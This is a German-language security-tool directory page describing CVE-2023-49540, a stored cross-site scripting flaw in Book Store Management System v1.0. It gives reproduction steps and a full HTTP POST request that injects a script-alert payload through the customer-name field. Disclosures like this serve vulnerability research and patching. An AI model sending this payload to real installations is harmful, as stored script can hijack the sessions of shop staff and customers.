Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-49540 — Book Store Management System v1.0 - Cross-site scripting (XSS) Schwachstelle in /index.php/history - anfälliges Feld: "Kundenname". | Kitploit
Tools/GitHubGitHub/geraldoalcantara/cve-2023-49540
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubgeraldoalcantara/cve-2023-49540

CVE-2023-49540

Book Store Management System v1.0 - Cross-site scripting (XSS) Schwachstelle in /index.php/history - anfälliges Feld: "Kundenname".

Repository anzeigen
1vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-49540

Buchladen-Verwaltungssystem v1.0 – Cross-Site-Scripting (XSS)-Schwachstelle in /index.php/history – verwundbares Feld: „Name des Kunden".

Beschreibung: Das Buchladen-Verwaltungssystem v1.0 wurde dahingehend untersucht, dass es eine Cross-Site-Scripting (XSS)-Schwachstelle in /bsms_ci/index.php/history enthält. Die Nutzlast wird in das Feld „Name des Kunden" auf der Seite /bsms_ci/index.php/transaction eingefügt. Beim Aufruf der Seite /bsms_ci/index.php/history wird unsere Nutzlast erfolgreich injiziert und ist funktionstüchtig.

Betroffene Produktversion: Buchladen-Verwaltungssystem v1.0
CVE-Autor: Geraldo Alcântara
Datum: 29.11.2023
Bestätigt am: 15.12.2023
CVE: CVE-2023-49540
Getestet auf: Windows

Schritte zur Reproduktion:

Um dies auszunutzen, wird die Nutzlast in das Feld „Name des Kunden" auf der Seite „/bsms_ci/index.php/transaction" eingefügt. Bei der Überprüfung auf der Seite „/bsms_ci/index.php/history" wird bestätigt, dass die Nutzlast erfolgreich injiziert und betriebsbereit ist.

Anfrage:

POST /bsms_ci/index.php/transaction/save HTTP/1.1
Host: 192.168.68.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/bsms_ci/index.php/transaction
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; ci_session=5e3p7a2j4a65ocjof08v80jugf17i5cd
Upgrade-Insecure-Requests: 1

user_code=2&buyer_name=1200%3cscript%3ealert(1)%3c%2fscript%3e&total=0&pay=Pay

Entdecker/Quellenangaben: Geraldo Alcântara

Tool herunterladen